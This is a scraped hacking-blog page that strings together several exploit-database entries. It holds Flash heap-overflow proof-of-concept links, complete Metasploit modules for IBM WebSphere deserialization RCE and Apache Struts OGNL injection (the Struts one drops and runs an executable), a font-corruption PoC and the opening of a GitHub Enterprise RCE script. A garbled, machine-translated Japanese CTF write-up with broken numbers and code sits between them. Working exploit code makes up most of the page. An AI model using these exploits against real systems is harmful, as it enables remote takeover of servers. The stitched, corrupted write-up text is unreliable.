Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015
The attached file causes an overflow in heap thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41610.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863294484
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016
The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, but both attached files on a server and visit: http://127.0.0.1/LoadImage.swf?img=planar1.atf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41611.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017
There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41612.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "IBM WebSphere RCE Java Deserialization Vulnerability",
'Description' => %q{
This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization
call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows
remote arbitrary code execution. Authentication is not required in order to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Liatsis Fotios @liatsisfotios' # Metasploit Module
# Thanks for helping me:
# # # # # # # # # # # #
# Kyprianos Vasilopoulos @kavasilo # Implemented and reviewed - Metasploit module
# Dimitriadis Alexios @AlxDm_ # Assistance and code check
# Kotsiopoulos Panagiotis # Guidance about Size and Buffer implementation
],
'References' =>
[
['CVE', '2015-7450'],
['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171']
],
'Platform' => 'win',
'Targets' =>
[
[ 'IBM WebSphere 7.0.0.0', {} ]
],
'DisclosureDate' => "Nov 6 2015",
'DefaultTarget' => 0,
'DefaultOptions' => {
'SSL' => true,
'WfsDelay' => 20
}))
register_options([
OptString.new('TARGETURI', [true, 'The base IBM\'s WebSphere SOAP path', '/']),
Opt::RPORT('8880')
], self.class)
end
def exploit
# Decode - Generate - Set Payload / Send SOAP Request
soap_request(set_payload)
end
def set_payload
# CommonCollections1 Serialized Streams
ccs_start = "rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQ="
ccs_end = "dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo="
# Generate Payload
payload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end)
payload_exec = Rex::Text.encode_base64(payload_exec)
end
def invoke_ccs(serialized_stream)
# Decode Serialized Streams
serialized_stream = Rex::Text.decode_base64(serialized_stream)
end
def gen_payload
# Staging Native Payload
exec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
exec_cmd = exec_cmd.gsub("%COMSPEC% /b /c start /b /min ", "")
# Size up RCE - Buffer
cmd_lng = exec_cmd.length
lng2str = "0" + cmd_lng.to_s(16)
buff = [lng2str].pack("H*")
rce_pld = buff + exec_cmd
end
def soap_request(inject_payload)
# SOAP Request
req = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
req += "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">" + "\r\n"
req += "<SOAP-ENV:Header xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"7.0.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">" + "\r\n"
req += "<LoginMethod>BasicAuth</LoginMethod>" + "\r\n"
req += "</SOAP-ENV:Header>" + "\r\n"
req += "<SOAP-ENV:Body>" + "\r\n"
req += "<ns1:getAttribute xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" + "\r\n"
req += "<objectname xsi:type=\"ns1:javax.management.ObjectName\">" + inject_payload + "</objectname>" + "\r\n"
req += "<attribute xsi:type=\"xsd:string\">ringBufferSize</attribute>" + "\r\n"
req += "</ns1:getAttribute>" + "\r\n"
req += "</SOAP-ENV:Body>" + "\r\n"
req += "</SOAP-ENV:Envelope>" + "\r\n"
uri = target_uri.path
res = send_request_raw({
'method' => 'POST',
'version' => '1.1',
'raw_headers' => "Content-Type: text/xml; charset=utf-8" + "\r\n" + "SOAPAction: \"urn:AdminService\"" + "\r\n",
'uri' => normalize_uri(uri),
'data' => req
})
end
end
1。 JSコード分析のコーディング変換
writeup:open index.htmlscript src='script-min.js'/scrip //最初の呼び出し.jsスクリプトタイプ='text/javascript' var ic=false; #デフォルトIC値はfalse var fg=''です。 function getFlag(){//関数関数のgetfflagボタンは、対応するイベントvar token=document.getElementById( 'sectoken')。valueをトリガーします。 //#テキスト入力ボックスの値を割り当ててくださいtoken ic=checktoken(token); //checktoken(token)関数を呼び出して、チェックして割り当てます。関数パッケージにはFG=BM(トークン)が含まれています。 //function checktoken(token)を呼び出してshowflag()を割り当てますvar f=document.getElementById( 'flag'); t.innertext=! ic? 「あなたは下の旗を手に入れました!」 : '間違って!'; T.ClassName=! IC? 'rightflag' : '間違ったフラグ'; f.innertext=fg; }/script/head body h1flag in your hand/h1 ptype in goot flag./p ptips:フラグは手にあります。 onclick='getflag()'//p2。ボタンをクリックするとGetFlag機能がトリガーされることは明らかです。デフォルトでfalseになります。 CheckToken(トークン)関数を呼び出すため、CheckToken関数が重要なポイントであることを意味します。
3。 Checktoken関数を開き、コンテンツを表示します。フラグが偽のトークン
4である可能性があります。ただし、入力後、エラーを依然としてプロンプトするため、FG=BM(トークン)のみがあります。このコードには問題があります。
5。 ICを直接検索します。つまり、ICはこの側で偽りになっている必要があります。
6。左側のアイコンの下のブレークポイントをクリックし、ボタンをクリックして、それを正常に壊しました。関数パラメーターsが入力した変数であり、sの長さをAと比較し、sの値を使用して3とaの値を差し引くことがわかりました。問題がない場合は、trueを返してください。したがって、trueを返すsを逆に推定するだけです。ソリューションコードは次のとおりです:a=[118、104、102、120、117、108、119、124、48、123、101、120]
S=''
A:のIの場合
s +=chr(i -3)
印刷
8。トークンボックス
9にSecurity-XBUを入力します。最後に、flag:renibyd8fgg5hawvqm7tdq
2。 Base64キーボードパスワードのエンコード
writetup:1を取得します。ファイルを開いた後、2つのヘックス文字列636A56355279427363446C4A49454A7154534230526D6843 564445A31614342354E326C4B49466667A5742696969614530672。 Hexadecimal stringをasciihttp://www.ab126.com/goju/1711.html 
get:cjv5rybscdljiejqtsb0rmhcvdz1Acb5n2lkiffzwia0g3。 base64:
get:r5yg lp9i bjm tfhb t6uh y7ij qsz bhm4。 4文字ごとにスペースがあることを確認し、キーボードを見て、キーボードのパスワードであることがわかります。つまり、キーボードの文字を囲む数文字です。たとえば、r5ygはt、lp9iはoを囲まれています。キャラクターの各グループに囲まれたキャラクターを見つけて、フラグを形成してください。 (プレフィックスを追加する必要はありません)5。GET:R5YG-T、LP9I-O、BJM-N、TFHB-G、T6UH-Y、Y7IJ-U、QSZ-A、BHM-N6。最後に、flag:tongyuan
3。産業用フローパッケージ分析
writeup:1。トラフィックパケットを開き、ARP、UDP、SNAプロトコルに関するトラフィックパケットがあり、図に示すように大量のUDPトラフィックがあることを見つけます:
2。まず、UDPトラフィックパケットを分析し、長さのUDPトラフィックパケットが多数あることを発見し、総長さが表示されていることがわかります。 1回しか表示されないパケット。
3。ここでは、UDPストリームトラッキングが12の長さで実行され、疑わしい文字が見つかりました
4.文字列666C61677B37466F4D3253746B6865507A7Dを抽出し、対応するACIIコードhttp://WWW.AB126.com/goju/1711.html 
5。
iv。テキストの通常の大文字
1。添付ファイルをダウンロードした後、私はそれが大きなテキストであることがわかりました。テキストを慎重に観察した後、私はテキストに故意に大胆になっている大文字がたくさんあることがわかりました。
2。首都を除外します
catf590c0f99c014b01a5ab8b611b46c57c.txt | grep-o '[a-z]' | tr-d '\ n'ここ:
GREP -Oは一致する文字列TR -Dを表示するだけで表示されます。指定された文字
3。フィルタリングされた文字を取得:ゼロネゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロゼロネズONEONEZEROZEROONEONEONEONEZEROONEONEZEROONEONEZEROONEZEROZEROZEROZEROZEROONEONEZEROZEROZEROONEZEROONEONEZEROZEROONEZEROZEROZEROZEROONEONEZEROZEROONEONEZEROONEZEROONEONEONEONEONEZEROZEROONEONEZEROZEROZEROONEZEROONEONEZE ROONEONEONEONEZEROONEZEROONEZERONEZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZERONEZEROZEREONEONEZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZEROZERONEZERONEZERONEZERONEONE4。記事のすべての大文字を抽出し、ゼロと1つで構成される文字列を取得します。ゼロを番号0に、1つを番号1に置き換えて、表現されたバイナリ数を取得し、この数値を文字列に変換します。
010000100100100101010100100110100001101010100010010011110110110100000101010110010010010011010111110011 0001011011100101111111110000011011000011010010010010001011011100101111001101010011001001001101110011001101111101
5。オンラインバイナリへの文字列:
http://www.txttool.com/wenben_binarystr.asp
6.pythonスクリプト取得
#coding:UTF-8-from string Import Emptercase
crypto.util.Number inmort long_to_bytesから
def solve():
f:#data.txtとしてopen( 'data.txt'、 'r')が上でフィルタリングされた大文字です
data=f.read()
cip=''
データ:のCの場合
cpercase:のcの場合
CIP+=c
cip=cip.replace( 'zero'、 '0')
cip=cip.replace( 'one'、 '1')
long_to_bytesを返す(long(cip、2))
__NAME __=='__ Main __' :の場合
Solve()
を印刷します
7. flagを取得:bitsctf {h1d3_1n_pl41n_5173}
v。 RSA復号化
質問説明:ファディはあなたが新人だと思っていて、彼が投稿したものを見ることを恐れていませんでした。彼は平易なテキストで彼の友人に以下を送りました: P=0xA6055EC186DE51800DDD6FCBF0192384FF42D707A55F57AF4FCFB0D1DC7BD9 7055E8275CD4B78EC63C5D592F567C66393A061324AA2E6A8D8FC2A910CBEE1ED9 Q=0xFA0F9463EA0A93B929C099320D31C277E0B0DBC65B189ED76124F5A1218F5D 91FD0102A4C8DE11F28BE5E4D0AE91AB319F4537E97ED74BC663E972A4A9119307 E=0x6D1FDAB4CE3217B3FC32C9ED480A31D067FD57D93A9AB52B472DC393AB785 2FBCB11ABBEBFD6AAAE8032DB1316DC22D3F7C3D631E24DF13EF23D3B381A1C3E 04ABCC745D402EE3A031AC2718FAE63B240837B4F657F29CA4702DA9AF22A3A01 9D68904A969DDB01BCF941DF70AF042F4FAE5CBEB9C2151B324F387E525094C41 C=0x7FE1A4F743675D1987D25D38111FAE0F78BBEA6852CBA5BEDA47DB76D119A3EFE24CB04B9449F53BECD43B0B46E269826A83F832832832BBB53555555555555555555555555555555555555555555555555555555555555555555553 8344ED5C20F51E2686D24C76050C1E73647523BD5F91D9B6AD3E86BBF912658 8B1DEE21E6997372E36C3E74284734748891829665086E0DC523ED23C386BB520彼は私たちの復号化能力Writeup:を真剣に過小評価していました
1。質問の16進数を小数点に変換します。
https://tool.lu/hexconvert/
P=86952241150363555850657119739296036271134788610181138168484331081777772517 240308721981280176995392696427341397469232176120700610749965333026113898553049
Q=13096749823995628078930936161926731369550833801075399550861609999067145714985 0288846976369829603845838414249722038514443535111987497145134804975486079751
E=76629781387397242643116709874317578271441392556392807529834168670310153073 520143866486739942179138155817821866364881591859652274493031187833628624358994 867175044572336498295631763539498171499977327643558191037055959594639570436120 59621114897322707756573946764130942694529006537681147498322988959999999989800641
C=8980138944356956995739840695470759849276392341856853603032354608827875836233104 3197364379101176970325948359029005820403943674808298008972319252338074527838935 803140427806463333626149336724945854865041439061149411962509247624419480 036048744062822136093417043390251690152562280292002226433430028828280630082。スクリプトを使用してRSAのM値を取得します
#コーディング=utf-8
gmpy2をインポートします
crypto.util.Numberインポートから *
gmpy2からIrootをインポートし、反転します
P=86952241150363555850657119739296036271134788610181138168484331081777772517 240308721981280176995392696427341397469232176120700610749965333026113898553049
Q=13096749823995628078930936161926731369550833801075399550861609999067145714985 0288846976369829603845838414249722038514443535111987497145134804975486079751
E=76629781387397242643116709874317578271441392556392807529834168670310153073 520143866486739942179138155817821866364881591859652274493031187833628624358994 867175044572336498295631763539498171499977327643558191037055959594639570436120 59621114897322707756573946764130942694529006537681147498322988959999999989800641
c=8980138944356956995739840695470759849276392341856853603032354608827875836233104311936363791011777777777777 697032594835902900582040394367480829800897231925233807452783893580314042780646333313626149333333333333333333333333
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection',
'Description' => %q{
This module exploits a remote code execution vunlerability in Apache Struts
version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed
via http Content-Type header.
Native payloads will be converted to executables and dropped in the
server's temp dir. If this fails, try a cmd/* payload, which won't
have to write to the disk.
},
'Author' => [
'Nike.Zheng', # PoC
'Nixawk', # Metasploit module
'Chorder', # Metasploit module
'egypt', # combining the above
'Jeffrey Martin', # Java fu
],
'References' => [
['CVE', '2017-5638'],
['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045']
],
'Privileged' => true,
'Targets' => [
[
'Universal', {
'Platform' => %w{ unix windows linux },
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
},
],
],
'DisclosureDate' => 'Mar 07 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]),
]
)
register_advanced_options(
[
OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ])
]
)
@data_header = "X-#{rand_text_alpha(4)}"
end
def check
var_a = rand_text_alpha_lower(4)
ognl = ""
ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
begin
resp = send_struts_request(ognl)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end
if resp && resp.code == 200 && resp.headers[var_a]
vprint_good("Victim operating system: #{resp.headers[var_a]}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
case payload.arch.first
#when ARCH_JAVA
# datastore['LHOST'] = nil
# resp = send_payload(payload.encoded_jar)
when ARCH_CMD
resp = execute_command(payload.encoded)
else
resp = send_payload(generate_payload_exe)
end
require'pp'
pp resp.headers if resp
end
def send_struts_request(ognl, extra_header: '')
uri = normalize_uri(datastore["TARGETURI"])
content_type = "%{(#_='multipart/form-data')."
content_type << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
content_type << "(#_memberAccess?"
content_type << "(#_memberAccess=#dm):"
content_type << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
content_type << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
content_type << "(#ognlUtil.getExcludedPackageNames().clear())."
content_type << "(#ognlUtil.getExcludedClasses().clear())."
content_type << "(#context.setMemberAccess(#dm))))."
content_type << ognl
content_type << "}"
headers = { 'Content-Type' => content_type }
if extra_header
headers[@data_header] = extra_header
end
#puts content_type.gsub(").", ").\n")
#puts
resp = send_request_cgi(
'uri' => uri,
'method' => datastore['HTTPMethod'],
'headers' => headers
)
if resp && resp.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
resp
end
def execute_command(cmd)
ognl = ''
ognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).|
# You can add headers to the server's response for debugging with this:
#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
#ognl << %q|(#r.addHeader('decoded',#cmd)).|
ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
ognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).|
ognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).|
ognl << %q|(#p.redirectErrorStream(true)).|
ognl << %q|(#process=#p.start())|
send_struts_request(ognl, extra_header: cmd)
end
def send_payload(exe)
ognl = ""
ognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).|
ognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).|
#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).|
#ognl << %q|(#r.addHeader('file',#f.getAbsolutePath())).|
ognl << %q|(#f.setExecutable(true)).|
ognl << %q|(#f.deleteOnExit()).|
ognl << %q|(#fos=new java.io.FileOutputStream(#f)).|
# Using stuff from the sun.* package here means it likely won't work on
# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to
# work and I don't see a better way of getting binary data onto the
# system. =/
ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).|
ognl << %q|(#fos.write(#d)).|
ognl << %q|(#fos.close()).|
ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|
ognl << %q|(#p.start()).|
ognl << %q|(#f.delete())|
send_struts_request(ognl, extra_header: [exe].pack("m").delete("\n"))
end
end
=begin
Doesn't work:
ognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).|
ognl << %q|(#c=#cl.loadClass('metasploit.Payload')).|
ognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).|
ognl << %q|(#r.addHeader('meth',#m.toGenericString())).|
ognl << %q|(#m.invoke(null,null)).|
#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899
#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed
#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6
#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0
#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).|
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5
#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed
#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884
=end
# Date: 15-03-2017
# Author: Hossein Lotfi (https://twitter.com/hosselot)
# CVE: CVE-2016-7274
1. Description
An integer overflow error within the "LoadUvsTable()" function of usp10.dll
can be exploited to cause a heap-based buffer overflow. Full analysis is
available at:
http://blogs.flexerasoftware.com/secunia-research/2016/12/microsoft_windows_loaduvstable_heap_based_buffer_overflow_vulnerability.html
2. Proof of Concept
open “C:\Windows\Fonts\phagspa.ttf” in a hex editor and change the value at
offset 0x2051 from 0x00000006 to 0x33333334.
3. Solution:
Microsoft initially tried to fixed the issue in MS16-147, but the fix was
incomplete and the issue remained unpatched til Microsoft March 2017 patch
release:
https://twitter.com/hosselot/status/809059287037251584
It appears MS17-013 finally fixed the vulnerability properly:
https://technet.microsoft.com/en-us/library/security/ms17-013.aspx
@hosselot
#!/usr/bin/ruby
require "openssl"
require "cgi"
require "net/http"
require "uri"
SECRET = "641dd6454584ddabfed6342cc66281fb"
puts ' ___. .__ '
puts ' ____ ___ ________ \_ |__ | | __ __ ____ '
puts '_/ __ \\\\ \/ /\__ \ | __ \| | | | \_/ __ \ '
puts '\ ___/ > < / __ \| \_\ \ |_| | /\ ___/ '
puts ' \___ >__/\_ \(____ /___ /____/____/ \___ >'
puts ' \/ \/ \/ \/ \/ '
puts ''
puts "github Enterprise RCE exploit"
puts "Vulnerable: 2.8.0 - 2.8.6"
puts "(C) 2017 iblue <iblue@exablue.de>"
unless ARGV[0] && ARGV[1]
puts "Usage: ./exploit.rb <hostname> <valid ruby code>"
puts ""
puts "Example: ./exploit.rb ghe.example.org \"%x(id > /tmp/pwned)\""
exit 1
end
hostname = ARGV[0]
code = ARGV[1]
# First we get the cookie from the host to check if the instance is vulnerable.
puts "[+] Checking if #{hostname} is vulnerable..."
http = Net::HTTP.new(hostname, 8443)
http.use_ssl = true
